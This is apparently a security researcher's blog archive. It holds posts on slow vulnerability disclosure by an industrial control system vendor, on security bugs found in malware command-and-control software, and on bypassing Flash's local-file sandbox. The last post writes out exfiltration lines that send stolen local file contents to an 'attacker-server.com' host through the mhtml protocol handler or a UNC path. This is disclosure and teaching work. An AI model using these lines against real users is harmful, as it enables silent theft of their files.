Archive for the 'Security' Category

Thursday, July 12th, 2012

Tridium – An ICS Learning Moment…

We are happy to see Robert O’Harrrow is shining a light on the vulnerabilities associated with Industrial Control Systems (ICS). The ICS software community is light years behind modern software security. Sadly, we can honestly say that the security of iTunes is more robust than most ICS software. Terry and I plan on releasing some technical details about what we’ve found in the near future, but for now we wanted to talk about some of our experiences with this particular issue.

First, ICS-CERT has done a great job tracking this issue. It’s been months since we first reported the issue to ICS-CERT. Following up with an unresponsive vendor is extremely frustrating. It was apparent that ICS-CERT was making every effort to follow-up with Tridium and they kept us well informed throughout the entire process. We especially want to thank those ICS-CERT analysts who kept us apprised of developments despite the lack of response and unwillingness of Tridium to accept responsibility for the issue.

We are disappointed that it took so long for the public to become aware of this issue. According to the Washington Post article, Tridium became aware of this vulnerability “almost a year ago, when a Niagara customer that uses the software to manage Pentagon facilities turned up issues in an audit”. We are disappointed that even after discovering critical, remotely exploitable vulnerabilities in Tridium software… our government chose to purchase and implement the software anyway. We are disappointed that our tax payer money paid for the ignored security audit, paid for the acquisition, and paid for the implementation/deployment of known vulnerable software. We’d like to challenge our nation’s leadership to evaluate the failures in our current processes surrounding the acquisition of software that support Critical Infrastructure and Industrial Control Systems.

At times, we felt like ICS-CERT had their hands tied. We realize when you are working with vulnerabilities that could affect critical infrastructure, a delicate balance between disclosure and timely notification of affected organizations must be maintained. However, when a vendor is unresponsive or refuses to accept responsibility for an issue, ICS-CERT should have the authority to inform those customers who are vulnerable in a timely manner. DHS and ICS-CERT work for us, the American people… they do not work for the PR departments of ICS companies. ICS-CERT should be able to take the appropriate actions to ensure that we’re safe and to ensure ICS customers have the right information to mitigate and control risk. The PR damage done to any individual company should never be part of this equation. If a vendor is unresponsive or unwilling to accept responsibility for a security issue, ICS-CERT should have the option of disclosing issues (45) days after initial notification from external researchers (this is consistent with CERT/CC’s disclosure timelines). Of course, special circumstances require special handling, but we’re sure the folks at ICS-CERT can make those determinations when needed.

Probably the most disappointing part of the whole ordeal is Tridium’s eagerness to blame the customer. We’ve seen this from other ICS vendors as well. It should never be the customer’s responsibility to have to compensate for poor design. Many ICS vendors expect customers to ensure their product is implemented securely, yet provide zero (or extremely vague) guidance on how to do so. In many cases, secure deployment is simply impossible due to the extremely poor security design. Notification, automatic patching, and secure implementation guidelines in the ICS world are light years behind modern software. We don’t understand Tridium’s claims that, “The firm also is doing more to train customers about security” when the root cause of these issues is poor design and coding practices from Tridium itself. Maybe Tridium should invest in training their developers about security first…

If you would like to contact us about our experiences, please email us at: help – at – fixicssecurity.com

Billy Rios @xssniper and Terry McCorkle @0psys

Posted by xssniper | Filed in ICS, Security | Comment now »

 

Friday, June 10th, 2011

Turning the Tables – Part II

I’m posting some of the research I’ve been working on over the last few months. I planned on submitting some of this research to the Blackhat/DEFCON CFP, but it looks like I’ll be tied up for most of the summer and I won’t be able to make it out to Vegas for BH or DEFCON this year (pour some out and “make it rain” for me). The gist of the research is this: I’ve collected of number of malware C&C software packages. I set up these C&Cs in a virtual network and audited the applications and source code (when available) for bugs. The results were surprising; most of the C&C software audited has pretty crappy security.

This week’s sample is an auth bypass and SQL injection on a BlackEnergy C&C page. The first of the samples can be found here: http://software-security.sans.org/blog/2011/06/10/spot-the-vuln-rabbit-authbypass-and-sqli

I’ll post more samples in the coming weeks.

Attacking malware C&C is an interesting proposition. Exploiting a single host can result in the transfer of hundreds or even thousands of hosts from one individual to another. I’m not the first to note that malware and C&C software is evolving. Gone are the days of simple IRC bots receiving clear text commands from an IRC server. Today’s C&C’s are full fledged, feature rich applications with much complexity. Complexity is the enemy of security, even malware authors cannot escape this. There is no magic bullet, even malware authors face the difficulties of writing secure code. This is especially so if their customers are paying money for C&C software and demand newer features and robust interfaces. Today’s malware landscape looks much like a typical software enterprise with paying customers, regularly scheduled feature updates, marketing, and a sprinkling of PR. Who knows, maybe in the near future these malware enterprises will have dedicated, on-call security engineering teams and a formal SDL process :)

Posted by xssniper | Filed in Web Application Security | Comment now »

 

Tuesday, January 4th, 2011

Bypassing Flash’s local-with-filesystem Sandbox

A few weeks ago, I posted a description of a set of bugs that could be chained together to do “bad things”.  In the PoC I provided, a SWF file reads an arbitrary file from the victim’s local file system and passes the stolen content to an attacker’s server.

One of the readers (PZ) had a question about the SWFs local-with-filesystem sandbox, which should prevent SWFs loaded from the local file system from passing data to remote systems.  Looking at the documentation related to the sandbox, we see the following:

Local file describes any file that is referenced by using the file: protocol or a Universal Naming Convention (UNC) path. Local SWF files are placed into one of four local sandboxes:


The local-with-filesystem sandbox—For security purposes, Flash Player places all local SWF files and assets in the local-with-file-system sandbox, by default. From this sandbox, SWF files can read local files (by using the URLLoader class, for example), but they cannot communicate with the network in any way. This assures the user that local data cannot be leaked out to the network or otherwise inappropriately shared.

First, I think the documentation here is a bit too generous.  SWFs loaded from the local file system do face some restrictions.  The most relevant restrictions are probably:

  1. The SWF cannot make a call to JavaScript (or vbscript), either through URL or ExternalInterface
  2. The SWF cannot call a HTTP or HTTPS request.
  3. Querystring parameters (ex. Blah.php?querystring=qs-value) are stripped and will not be passed (even for requests to local files)

Unfortunately, these restrictions are not the same as, “cannot communicate with the network in any way” which is what is stated in the documentation.  The simplest way to bypass the local-with-filesystem sandbox is to simply use a file:// request to a remote server.  For example, after loading the content from the local file system an attacker can simply pass the contents to the attacker server via getURL() and a url like:  file://\\192.168.1.1\stolen-data-here\

Fortunately, it seems you can only pass IPs and hostnames for system on the local network (RFC 1918 addresses).  If an attacker wants to send data to a remote server on the Internet we’ll have to resort to a couple other tricks.  A while back, I put up a post on the dangers of blacklisting protocol handlers.  It’s basically impossible to create a list of “bad” protocol handlers in siutation like this.  In the case of the local-with-filesystem sandbox, Adobe has decided to prevent network access through the use of protocol handler blacklists.  If we can find a protocol handler that hasn’t been blacklisted by Adobe and allows for network communication, we win. 

There are a large number of protocol handlers that meet the criteria outlined in the previous sentence, but we’ll use the mhtml protocol handler as an example.  The mhtml protocol handler is available on modern Windows systems, can be used without any prompts, and is not blacklisted by Flash.  Using the mhtml protocol handler, it’s easy to bypass the Flash sandbox:

getURL(‘mhtml:http://attacker-server.com/stolen-data-here‘, ”);

Some other benefits for using the mhtml protocol handler are:

  1. The request goes over http/https and port 80/443 so it will get past most egress filtering
  2. If the request results in a 404, it will silently fail.  The data will still be transmitted to the attackers server, but the victim will never see an indication of the transfer
  3. The protocol handler is available by default on Win7 and will launch with no protocol handler warning

There you go, an easy way to bypass Flash’s local-with-file system sandbox.  Two lessons here.  One, running un-trusted code (whether it’s an executable, javascript, or even a swf) is dangerous.  Two, protocol handler blacklists are bad.  Hope this helps PZ!

Posted by xssniper | Filed in Security | 36 Comments »